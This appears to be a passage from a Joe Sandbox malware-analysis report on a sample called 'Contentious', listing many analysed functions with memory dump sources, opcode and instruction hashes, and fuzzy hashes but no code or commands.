                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1f9c8792e68683e4cc29e5bb437c246f716a1b215f285584ce89a3fe92b5221
                                            • Instruction ID: 47ff557dc7526abf57c67e5b04350a36ca296efe6397d9326d4c7c5dbe60c0a7
                                            • Opcode Fuzzy Hash: d1f9c8792e68683e4cc29e5bb437c246f716a1b215f285584ce89a3fe92b5221
                                            • Instruction Fuzzy Hash: A5C1A174E00218CFDB14DFA5C994BADBBF2AF89305F2080A9D419AB365DB355E85CF50
                                            Function 20CBBC08 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2c4d659c170acc25faebc3a43667988764add60dfeb7ab0ec5c62a846bcc082
                                            • Instruction ID: 014058e8436c039d073ee5693d45ae0936607c8f77e79310b0113dcd508388cb
                                            • Opcode Fuzzy Hash: e2c4d659c170acc25faebc3a43667988764add60dfeb7ab0ec5c62a846bcc082
                                            • Instruction Fuzzy Hash: E7C1A174E00218CFDB14DFA5C994BADBBF2AF89305F2080A9D419AB365DB359E81CF10
                                            Function 20CBF028 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20c9a63e1a7b6999825d1cf4967ff214171b8aad9d5589c09ea4d78f97cbce38
                                            • Instruction ID: 52c7086f3c800bf482116c2e62303b4bbeb215c13f612822499e42c292e8d5b5
                                            • Opcode Fuzzy Hash: 20c9a63e1a7b6999825d1cf4967ff214171b8aad9d5589c09ea4d78f97cbce38
                                            • Instruction Fuzzy Hash: 31C1A1B4E00218CFDB54DFA5C994B9DBBF2AF89305F2080A9D419AB365DB355E85CF10
                                            Function 20CBD1C0 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f61c447d13ff40492a86ab1a6991cc38eeb90dc731ed7f4d037755ff7bb2e960
                                            • Instruction ID: a6a459d6f2de333ae9a9d1a557dd6ee9c450be60ea0474dcf75c8ebe39b90c04
                                            • Opcode Fuzzy Hash: f61c447d13ff40492a86ab1a6991cc38eeb90dc731ed7f4d037755ff7bb2e960
                                            • Instruction Fuzzy Hash: 41C1A0B4E01218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB355DB359E85CF10
                                            Function 20CBCD68 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5aaf6eec00d3f257f49af0e103ab02baec1ca6aab418e586e14eb2cbfa16912
                                            • Instruction ID: 9d4426e93d8517b7020c32013d2974bf3da29e4b066c162d92c8ea453031cacf
                                            • Opcode Fuzzy Hash: a5aaf6eec00d3f257f49af0e103ab02baec1ca6aab418e586e14eb2cbfa16912
                                            • Instruction Fuzzy Hash: F9C1A0B4E01218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB359E81CF10
                                            Function 20CB0900 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3308f6c54a3bef9b2948b993bdb2af266f22ab0522933ab5ecef37b553f6e51
                                            • Instruction ID: f03f77f1cf3e86d5dc45418b62044084cf1a05e37dbd466237ba5dde44dcf2fc
                                            • Opcode Fuzzy Hash: b3308f6c54a3bef9b2948b993bdb2af266f22ab0522933ab5ecef37b553f6e51
                                            • Instruction Fuzzy Hash: A8C19B74E00218CFDB14DFA5C994B9DBBF2BB89305F2080A9D819AB365DB359E85CF10
                                            Function 20CBC910 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8dd3499b40eaee8d843bdf809201da606ec78bbdea91767bbf88e8ab2e5a1f54
                                            • Instruction ID: 54575eb195c418ad90c3cf9bf162a17bdda0cad7b62bc88c9ad05798762c9274
                                            • Opcode Fuzzy Hash: 8dd3499b40eaee8d843bdf809201da606ec78bbdea91767bbf88e8ab2e5a1f54
                                            • Instruction Fuzzy Hash: 09C1A0B4E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D819AB365DB355E81CF50
                                            Function 20CBDEC8 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2ad80ec51053513755fcd2c7b404a24dc05df98275bb812b6a71cdb3d3fc85db
                                            • Instruction ID: f9495da494145dcfbc8183c8f9b7c8fdd27a2c5afe3cc1014a92f6315bb78830
                                            • Opcode Fuzzy Hash: 2ad80ec51053513755fcd2c7b404a24dc05df98275bb812b6a71cdb3d3fc85db
                                            • Instruction Fuzzy Hash: E7C1A1B4E01218CFDB54DFA5C994B9DBBF2AF89305F2080A9D819AB355DB355E81CF10
                                            Function 20CBDA70 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09c30aecf541583469fe46bb9fd60f66248bc2de21dacda55b5a29e68068dc2d
                                            • Instruction ID: 9b72f87467464627f01f12753d971c90a9f2ade32ce5abff97dfa002d325ef67
                                            • Opcode Fuzzy Hash: 09c30aecf541583469fe46bb9fd60f66248bc2de21dacda55b5a29e68068dc2d
                                            • Instruction Fuzzy Hash: 99C1AFB4E01218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB359E81CF10
                                            Function 20CBD618 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e9697e3c7206de6198fbdd2df9a6ada98057bed57ac928de3695cc12393802b
                                            • Instruction ID: 01014ebffe3c399da8ca452191f783ec6e9b406e9c7bbc57e8033dd057538637
                                            • Opcode Fuzzy Hash: 6e9697e3c7206de6198fbdd2df9a6ada98057bed57ac928de3695cc12393802b
                                            • Instruction Fuzzy Hash: C9C1A0B4E01218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB355E81CF50
                                            Function 20CBEBD0 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa56e27a7d18036e85f8b1c3365be2797703587e818abbaf3abf7312d9e37cfe
                                            • Instruction ID: 91b4e4a6ae7e2b4a89b5a7bcafaeb6f2d40f5102d7fede4f86a575e78fc13416
                                            • Opcode Fuzzy Hash: aa56e27a7d18036e85f8b1c3365be2797703587e818abbaf3abf7312d9e37cfe
                                            • Instruction Fuzzy Hash: BBC1A0B4E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB359E85CF50
                                            Function 20CBB7B0 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89464eede60945abca3526415081c83231beb22777e360edf8214fee9cd75e8c
                                            • Instruction ID: 694209959c61496fe4d94fddb555f51e843b42f780bc788c4af41003f306e2f3
                                            • Opcode Fuzzy Hash: 89464eede60945abca3526415081c83231beb22777e360edf8214fee9cd75e8c
                                            • Instruction Fuzzy Hash: 39C1A0B4E00218CFDB14DFA5C994B9DBBF2AF89305F2081A9D419AB365DB359E81CF50
                                            Function 20CBB358 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a77f7d75be21952537e5b104ffe022ac81ec9e960be7fd20021cc7e31bb6bf2
                                            • Instruction ID: 08f6d0495f30f33d481a0683ec15ca9e331dc121c4ae6fa0a0a8d506c4ccd78d
                                            • Opcode Fuzzy Hash: 5a77f7d75be21952537e5b104ffe022ac81ec9e960be7fd20021cc7e31bb6bf2
                                            • Instruction Fuzzy Hash: FEC1AFB4E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB359E85CF10
                                            Function 20CBE778 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77402173b3e2dfe9f934e9dc17685536a1c99470237485c6f12baefca6e6bcea
                                            • Instruction ID: c1e80e9dd144b1e59ff2ba576d47f5bef9192df466b27d252f5bd0c0ea7e883e
                                            • Opcode Fuzzy Hash: 77402173b3e2dfe9f934e9dc17685536a1c99470237485c6f12baefca6e6bcea
                                            • Instruction Fuzzy Hash: ACC1B0B4E00218CFDB54DFA5C994B9DBBF2AF89305F2080A9D819AB365DB355E85CF10
                                            Function 20CBAF00 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6879c0fafac184c3772fd9d95a987f21c9cf2b82ecb5571d8a35866a3e69c15
                                            • Instruction ID: b964b38d46d5d0f6a36e9af60b521d8ec9ee054f9204dbb2ed81f259eadd8933
                                            • Opcode Fuzzy Hash: a6879c0fafac184c3772fd9d95a987f21c9cf2b82ecb5571d8a35866a3e69c15
                                            • Instruction Fuzzy Hash: 8BC1A1B4E00218CFDB14DFA5C994B9DBBF2AF89305F2081A9D419AB365DB355E85CF10
                                            Function 20CBE320 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37585c0f77568169c7907841b512b751d7a8bc1bca57110999946fc9d515a11e
                                            • Instruction ID: 2c1f4805b14c92535682cc9666b19c1fed61b2ca4eb489f29aac7293f2934852
                                            • Opcode Fuzzy Hash: 37585c0f77568169c7907841b512b751d7a8bc1bca57110999946fc9d515a11e
                                            • Instruction Fuzzy Hash: 53C1AFB4E01218CFDB14DFA5C994B9DBBF2AF89305F2080A9D419AB365DB359E85CF10
                                            Function 238255C0 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2418ad906f0501673db8c30617038e124a72e4fc51255a1d77c6692ab0a047b5
                                            • Instruction ID: 59a0eb9e1992013d37b13d8fcfb4520cec73d953016cfe9a5d31e54bbad1d769
                                            • Opcode Fuzzy Hash: 2418ad906f0501673db8c30617038e124a72e4fc51255a1d77c6692ab0a047b5
                                            • Instruction Fuzzy Hash: 98C1AE74E01258CFDB14DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E81CF10
                                            Function 23826FF8 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 326a9a00dd1f23d7c90126dbbed5a5e3d9e49b94b73b33f9bd5d25581bdd85fe
                                            • Instruction ID: ca32ae4fc40080b7e7951cb102671f2fff7fb38b777fccb03bce9623f710933c
                                            • Opcode Fuzzy Hash: 326a9a00dd1f23d7c90126dbbed5a5e3d9e49b94b73b33f9bd5d25581bdd85fe
                                            • Instruction Fuzzy Hash: 39C1A174E00258CFDB54DFA5C994B9DBBF2AF89305F6080A9E809AB365DB355E81CF10
                                            Function 23827D00 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67a92b7585fbd0b77e9800469de834cfd696f6f9973108dce296a55373fb7635
                                            • Instruction ID: 9c75dec83c64f2385c073d50b2dea25cc677ce9046d7fca58389987ccbd48a3b
                                            • Opcode Fuzzy Hash: 67a92b7585fbd0b77e9800469de834cfd696f6f9973108dce296a55373fb7635
                                            • Instruction Fuzzy Hash: 0FC19E74E00218CFDB54DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E81CF50
                                            Function 23826720 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 093e1bb89faa9388888ca6e0b6b24c8c26784d8cac349e105579845aa8de1130
                                            • Instruction ID: de5eabe5cdfef2af81a57a3d7aa62f5fff10f6b033858b69c29caa79c4abb043
                                            • Opcode Fuzzy Hash: 093e1bb89faa9388888ca6e0b6b24c8c26784d8cac349e105579845aa8de1130
                                            • Instruction Fuzzy Hash: 9AC19D74E00258CFDB14DFA5C994B9DBBB2AF89305F2080A9D809AB365DB359E85CF50
                                            Function 23825140 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 06dd9c9ed37f2e14c2fc8aaff1a2c7c849dd10a5c1a7e248514dd14f9ae57b8e
                                            • Instruction ID: 7b52fc61270f85a3f8320c67cd3912c11b0421c1332686e8326ee25ca71a82e2
                                            • Opcode Fuzzy Hash: 06dd9c9ed37f2e14c2fc8aaff1a2c7c849dd10a5c1a7e248514dd14f9ae57b8e
                                            • Instruction Fuzzy Hash: EBC1AE74E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E81CF10
                                            Function 23828158 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 83ceb5391726d2c4fe2f1dfebd61c776d69f8f2b5e29cc0e1713e29fa7209c2e
                                            • Instruction ID: bf20f5e6beb90ea68792515ea4c436fd32fe95f048d8c7a5b3fae72aa1ab16d3
                                            • Opcode Fuzzy Hash: 83ceb5391726d2c4fe2f1dfebd61c776d69f8f2b5e29cc0e1713e29fa7209c2e
                                            • Instruction Fuzzy Hash: C7C1AE74E00258CFDB54DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E85CF10
                                            Function 23826B78 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b1811f076b87d8ee8515960f22d6a5c75b104ec606f17c73c3b239665a9355c
                                            • Instruction ID: d58156fbc4a559483e6c8b468aaf251fe66b92e26d88e8dc2ab4723c089933fe
                                            • Opcode Fuzzy Hash: 1b1811f076b87d8ee8515960f22d6a5c75b104ec606f17c73c3b239665a9355c
                                            • Instruction Fuzzy Hash: C7C1BE74E00258CFDB14DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E81CF10
                                            Function 238278A8 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c94162e7dba3f04046fbd645458d7df4bb7456e8fca02536bfb632b6f0ae4a3e
                                            • Instruction ID: 3a432b85540d37138cd13f2a0acc182f9e2e860f861ce516560b36c96a173dc2
                                            • Opcode Fuzzy Hash: c94162e7dba3f04046fbd645458d7df4bb7456e8fca02536bfb632b6f0ae4a3e
                                            • Instruction Fuzzy Hash: B2C1A174E00258CFDB54DFA5C994B9DBBF2AF89305F2080A9E809AB365DB355E81CF10
                                            Function 238262C8 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c90751394c4cd51a862f3e1aa78e989c7915d5c0a8a8cb7199c617d303e7c9be
                                            • Instruction ID: 3909746558c445870db5e6a8ac6191f91a4f3350e182632a152b1ec1198dbdbb
                                            • Opcode Fuzzy Hash: c90751394c4cd51a862f3e1aa78e989c7915d5c0a8a8cb7199c617d303e7c9be
                                            • Instruction Fuzzy Hash: 25C1AE74E00218CFDB54DFA5C994B9DBBF2AF89305F2080A9D809AB365DB359E85CF10
                                            Function 238208F0 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de4f6e4451cdc7d89dfee935f94ff42aa74427281498635610dff5f310bc6308
                                            • Instruction ID: 74c3e5263163e1a9fd42761e2ca0a264e5288f8c731067280c322f36784f7ea8
                                            • Opcode Fuzzy Hash: de4f6e4451cdc7d89dfee935f94ff42aa74427281498635610dff5f310bc6308
                                            • Instruction Fuzzy Hash: 68C1AFB4E00218CFDB14DFA5C994B9DBBF2AF88305F2080A9D809AB365DB355E85CF10
                                            Function 23825A18 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0556fa5395bf69853350c6dc1a6051231dd3a5c01ec155b73be59ae09562f33
                                            • Instruction ID: 05319e2baeab8b445fdcf6eb96d39509e20d7e40d21b2d8f1622a14aa09072a7
                                            • Opcode Fuzzy Hash: e0556fa5395bf69853350c6dc1a6051231dd3a5c01ec155b73be59ae09562f33
                                            • Instruction Fuzzy Hash: 7BC1BE74E00218CFDB54DFA5C994B9DBBF2AF88305F2080A9D809AB365DB359E85CF50
                                            Function 23820040 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c471497a3ddc0cae6bd112ae04226605fa9f46c6f20edeb08c0abe2ef0074ebb
                                            • Instruction ID: ae9ce10ca2bc7288969a37ba1371b2f090605ebeba1042e20b422b2d9b1e1f51
                                            • Opcode Fuzzy Hash: c471497a3ddc0cae6bd112ae04226605fa9f46c6f20edeb08c0abe2ef0074ebb
                                            • Instruction Fuzzy Hash: 7DC1A074E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D809AB365DB355E81CF50
                                            Function 23827450 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c245da4b3a704768c009bd04067164b4fe3d9ab4c193a7f53c3dd92497e1f170
                                            • Instruction ID: 63ddb4fa861b4917f7cf2e8dd1f0d253b54a37a6971eb8125366af7f66705d06
                                            • Opcode Fuzzy Hash: c245da4b3a704768c009bd04067164b4fe3d9ab4c193a7f53c3dd92497e1f170
                                            • Instruction Fuzzy Hash: 10C1A074E00218CFDB54DFA5C994B9DBBF2AF88305F2080A9E809AB365DB355E81CF10
                                            Function 23825E70 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fdc524f59735372dae23a02aea96619dee6f5fab35338d63b26c855c2928c6fc
                                            • Instruction ID: b7b284c04f8640cf303d02b8289f810653ef14ea800edb1d4394243673f2519b
                                            • Opcode Fuzzy Hash: fdc524f59735372dae23a02aea96619dee6f5fab35338d63b26c855c2928c6fc
                                            • Instruction Fuzzy Hash: D5C1AE74E00218CFDB14DFA5C994B9DBBF2AF89305F2080A9D819AB365DB359E85CF50
                                            Function 23823360 Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4634971f076e8ea48846bdb72e0c1ff33d097bf7321421740cc08eee4689de5d
                                            • Instruction ID: 5fe6306af25d30b2aa7a5f2835dcbf0a170e6fd79ebed7256125d66ba23ebb89
                                            • Opcode Fuzzy Hash: 4634971f076e8ea48846bdb72e0c1ff33d097bf7321421740cc08eee4689de5d
                                            • Instruction Fuzzy Hash: 9FB18374E00618CFDB54DFA9C894A9DBBB2BF89301F2081A9D819AB365DB34A941CF40
                                            Function 0015DE23 Relevance: .2, Instructions: 193COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28b540aa9fe92fd47bde5617883759bd6eb0d7afed5300ae0c2a9ac7b3de78aa
                                            • Instruction ID: 9ee5eca821b552e8f219ecd885b84ba3f1555610ba8efa734102424f5fd2f2c6
                                            • Opcode Fuzzy Hash: 28b540aa9fe92fd47bde5617883759bd6eb0d7afed5300ae0c2a9ac7b3de78aa
                                            • Instruction Fuzzy Hash: 22A19E74A01228CFDB65DF24C894B9ABBB2BF49301F1085EAD40DAB250DB719EC5CF41
                                            Function 23823350 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10c9a89e68fa0c1a21411e47fa68906d3e37aa18857851cc6a9fe78f8d6e5b94
                                            • Instruction ID: 87acc2534ac6d77138989f84c3b3bd6e612451d5e4a34cf941da5223fc8ceae6
                                            • Opcode Fuzzy Hash: 10c9a89e68fa0c1a21411e47fa68906d3e37aa18857851cc6a9fe78f8d6e5b94
                                            • Instruction Fuzzy Hash: DE51C475E00648CFDB48CFAAD89499DBBF2BF89300F248169D419AB365DB749942CF04
                                            Function 0015E005 Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
